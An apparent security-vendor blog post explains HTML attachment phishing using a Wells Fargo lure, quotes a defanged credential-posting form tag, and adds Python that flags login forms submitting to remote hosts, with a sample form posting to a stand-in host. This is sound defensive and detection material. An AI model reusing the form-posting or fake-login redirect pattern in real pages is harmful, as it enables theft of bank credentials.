HTML Attachment Phishing: What You Need to Know



Are you aware of HTML attachment phishing? It is one of the latest trends with cybercriminals. Instead of emailing downloaders that contact C&C servers to download crypto malware, Trojans, or other nasties, HTML attachments are being sent. HTML attachment phishing is less well known, and as a result, many people are falling for these phishing scams.

Even though this past weekend was a holiday weekend for many, there is a good chance that you still checked your email fairly often. If you are like me, you typically use your phone or another mobile device to check your email on the go. This past weekend, you were probably multitasking and may not have been on high alert for a fraudulent message while you were checking email in between hiding and finding Easter eggs.

Hackers know these things.

So, they send crafty messages like this one (shown as opened in the Thunderbird email client):

If you open that message on your phone, the attachment would probably download with the message, and all you have to do is click to view it. This is a little different than your typical phishing message; a typical phishing message contains a button that has an embedded link that takes you to a lookalike of your bank’s or another online service provider’s real web site.

In today’s example, the phishing page has been stored as a file that looks like the following in a desktop browser:

It will also load up in your phone’s browser, but Safari (or another browser) on your phone may just show you a truncated version of the Internet address you are visiting. When it is a local file, you may just see a portion of the name of the file, Wells_Fargo-Personal-Business_Banking.htm as on my iPhone below:

So, what can Wells Fargo do about that? You may think there is no phishing content to be taken down or removed because it seems encapsulated in the email message. You may think that nobody is harmed if you don’t reply or fall for logging in this way. However, some folks WILL reply, and there is fraudulent content on the Internet that can be referred by Wells Fargo to their takedown provider.

In the source code of the HTML attachment are instructions for how to handle the credentials that the victim enters. Below is a snippet of the code from this phishing attack:

<form id="frmSignon" action="hxxp://" autocomplete="off" method="post" name="signon">

The highlighted portion is the path to a PHP script on a compromised server in Portugal that hosts a domain belonging to a Brazilian gospel video web site. Undoubtedly, if we could view the source code of that PHP script, we would see that it contains the email address of the criminal who is receiving the stolen Wells Fargo credentials. Wells Fargo wants to remove this fraudulent content before its customers can be victimized.
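As an added example (not part of the original article and not PhishMe's own tooling), the following Python shows one way a mail filter or analyst could pull the credential collection URL out of an HTML attachment: it finds forms that contain a password field and submit to a remote server. The sample attachment, the host `compromised.example` and the script path are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the snippet above; the host and path are
# placeholders, not values from the original attack.
SAMPLE_ATTACHMENT = """
<form id="frmSignon" action="hxxp://compromised.example/images/post.php"
      autocomplete="off" method="post" name="signon">
  <input type="text" name="userid">
  <input type="password" name="password">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
"""

class FormCollector(HTMLParser):
    """Record each form's action and whether it contains a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None  # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", "").strip(),
                          "password": False}
            self.forms.append(self._open)
        elif (tag == "input" and self._open is not None
              and a.get("type", "").lower() == "password"):
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def refang(url):
    """Undo the common hxxp defanging so the URL can be parsed."""
    return "http" + url[4:] if url.lower().startswith("hxxp") else url

def credential_post_targets(html):
    """Return (host, action) for password forms that submit to a remote server."""
    parser = FormCollector()
    parser.feed(html)
    hits = []
    for form in parser.forms:
        parts = urlsplit(refang(form["action"]))
        if form["password"] and parts.scheme in ("http", "https") and parts.hostname:
            hits.append((parts.hostname, form["action"]))
    return hits
```

A local `.htm` file whose login form posts to an absolute URL on an unrelated host is the pattern described above; the extracted host is what would be referred for takedown.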

When we visit that page, we see that the PHP code redirects victims to what we call the “exit URL,” which is a legitimate login page at Wells Fargo. The victim will then think that their login failed, and they will try to log in again. It is at that moment that Wells Fargo can recognize that customers who log in there—having been referred from the URL—are customers who likely just gave up their authentication credentials and should have their accounts locked until the situation is rectified.

PhishMe provides the intelligence that enables Wells Fargo and other spoofed brands to tackle this threat vector. Our PhishMe Intelligence system scans over two million spam messages daily to identify the messages that are delivering HTML attachments. Then we use our patented technology to automatically identify the file as a phishing attack and extract the relevant intelligence.

PhishMe digs deeper than other threat intelligence service providers to find the source of the attacks. Learn more about how we can help you protect your brand here.

